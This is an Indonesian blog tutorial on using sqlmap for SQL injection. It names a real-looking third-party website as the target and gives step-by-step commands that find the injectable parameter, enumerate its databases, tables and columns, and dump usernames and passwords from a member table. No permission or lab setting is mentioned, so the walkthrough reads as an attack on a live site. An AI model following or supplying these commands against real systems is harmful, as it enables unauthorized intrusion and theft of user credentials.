Kamis, 27 Desember 2018

SQL Injection Dengan Sqlmap

Desember 27, 2018 Hacking, Tutorial

Assalamualaikum wr wb hallo guys kembali bersama saya, disini saya akan memberikan tutorial SQLi Injection Dengan SQLMAP, sebelumnya udh ada yang tau itu tools sqlmap ???, kalau tidak cek aja wikipedia :")

lagsung saja cekidot

Pertama install dulu sqlmap nya, kebetulan saya pengguna linux tinggal ketik aja di terminal "sudo apt-get install sqlmap" (hilangkan tanda petiknya), untuk download dan cara install nya kunjungi di web resmi ya http://sqlmap.org/
sudah terinstall tinggal jalankan sqlmap saja di terminal (berikut tampilannya)
ketika sudah selesai semua, selanjutnya kita cari target hmm yang mana ya targetnya saya sudah siapkan https://avachara.com/avatar/fs_detail.php?id=100 ini target kita untuk mencari letak vuln SQLi nya kita tambahkan string di belakang angka https://avachara.com/avatar/fs_detail.php?id=100' dan kita enter hasilnya vuln !!! :")
selanjutnya buka sqlmap dan ketiklah sudo sqlmap -u https://avachara.com/avatar/fs_detail.php?id=100 --dbs --risk=3 --level=3, kita tunggu dan boom!! kita mendapatkan database nya
selanjutnya kita dump table nya dengan cara sudo sqlmap -u https://avachara.com/avatar/fs_detail.php?id=100 -D dak2_avachara --table --risk=3 --level=3, hasilnya !!
next kita pilih table dan dump column nya dengan cara sudo sqlmap -u https://avachara.com/avatar/fs_detail.php?id=100 -D dak2_avachara -T dakmember --column --risk=3 --level=3, nah dia akan tercetak columnya
selanjutnya kita akan dump data kita akan dump username and password dengan cara sudo sqlmap -u https://avachara.com/avatar/fs_detail.php?id=100 -D dak2_avachara -T dakmember -C nickname,password --dump --risk=3 --level=3, hasil nya tara !!!
segitu aja nih tutorialnya untuk lebih lengkapnya kunjungi git hub nya https://github.com/sqlmapproject/sqlmap dan web nya http://sqlmap.org/ disana banyak referensinya silahkan baca baca terima kasih